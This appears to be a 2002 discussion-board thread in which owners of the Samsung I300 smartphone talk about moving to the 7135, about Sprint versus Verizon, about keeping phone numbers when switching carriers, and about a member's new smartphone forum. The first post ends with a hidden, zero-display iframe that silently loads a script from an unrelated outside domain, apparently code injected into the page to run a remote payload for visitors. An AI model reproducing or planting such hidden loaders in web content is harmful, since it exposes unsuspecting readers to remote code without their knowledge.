+ Reply to Thread

Question Making the Switch? What now?

As our beloved I300 seems to be becoming yesterday's news, I just wanted to get a feel of where everyone is going to and if this board will remain active? I (like alot of people I think) am waiting on the 7135 and am already a user (same screen name) on smartphonesource.com. I hope the users of this board who get the 7135 will remain use phonesource because you have all been a great help and made the I300 a great phone to own! Just wanted your comments and plans... thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by clintrob; 10-08-2002 at 04:21 PM.

As soon as the 7135 is out on Verizon, I'm switching over to them. Personal preference, but I prefer my high-speed data useage to be billed by the minute and not by the meg (easier to track). The larger voice network won't be bad either. I was debating waiting it out for the 7135 on Sprint but an episode with their CS today eliminated that possibility. After arguing with 4 different reps for over an hour about a supposed $70 balance that had been supposedly rolling over from month to month since November of 2001, one finally got it straight and realized that that charge was simply my current month's useage. Go figure...

Red face sprint

I think for now I am going to stay with Sprint. I can't afford to change my phone number. I heard wind that soon a user will be able to swith carriers and keep the same number? Any truth to that?

Also, from everything I have heard so far, it looks like Verizon will release the 7135 before Sprint. But you never know, guess we will have to wait and see.

Congress was suppose to vote on the matter in September but I think the vote got pushed back a year ???

Administrator

Arrow

ayup, got pushed back...

im staying with sprint for the long haul. i have a good rapport with sprint and have some nice clout with them. to me , that aint worth giving up for a phone... i like the 7135, but not enuff to switch...

smartphonecentral.com

Smartphonecentral.com

I started smartphonecentral.com as a place to discuss all different smartphone models. Like many sphi300.com users, I still have my I300 but I'm not sure what direction to go next. I set up smartphonecentral.com so the community could continue to support all the various phones we may end up with.

I hope you can join us at smartphonecentral.com as the site grows and develops.
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

i300 knucklehead

Re: Smartphonecentral.com

Originally posted by wHo_tHe
    I started smartphonecentral.com as a place to discuss all different smartphone models. Like many sphi300.com users, I still have my I300 but I'm not sure what direction to go next. I set up smartphonecentral.com so the community could continue to support all the various phones we may end up with.

I hope you can join us at smartphonecentral.com as the site grows and develops.
    Dude, we get the picture. You've mentioned this board in a half dozen posts today. Now stop pimpin' your site please

(Click a sponser today!)

Re: Smartphonecentral.com

Originally posted by wHo_tHe
    Like many sphi300.com users, I still have my I300 but I'm not sure what direction to go next.
    In the same boat. It was so easy back when the i300 was the only viable option! Trying to figure out which way to go when most of my options aren't even on the market yet is driving me crazy.

Patwoods: Lighten up a little. Knowing how few boarders read ALL of the messages here, (and fewer who use the search function), I think Mr. _tHe is entitled to a little self promotion. No harm done.
    Gary

i300 knucklehead

Re: Re: Smartphonecentral.com

Originally posted by gpetty46

Patwoods: Lighten up a little. Knowing how few boarders read ALL of the messages here, (and fewer who use the search function), I think Mr. _tHe is entitled to a little self promotion. No harm done.
    You're right. I was only half-serious anyhow, hence the in the message.

smartphonecentral.com

No worries

Hey, no harm no foul. I wouldn't have posted the original announcement about the site had Brooks not OKd it, nor would I have followed it up had someone not posted a question about discussing other types of phones (twice).

Nor did I know Brooks would create new discussion groups, with which I wish him well and I look forward to participating in.

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

(Click a sponser today!)

Re: Re: Re: Smartphonecentral.com

Originally posted by patwoods

You're right. I was only half-serious anyhow, hence the in the message.
    You're right. I was only half-serious anyhoo, hence the the in MY message.

Jesse's site DOES need talking up. Not too many posts yet, but (just like here) I check in daily.
    Gary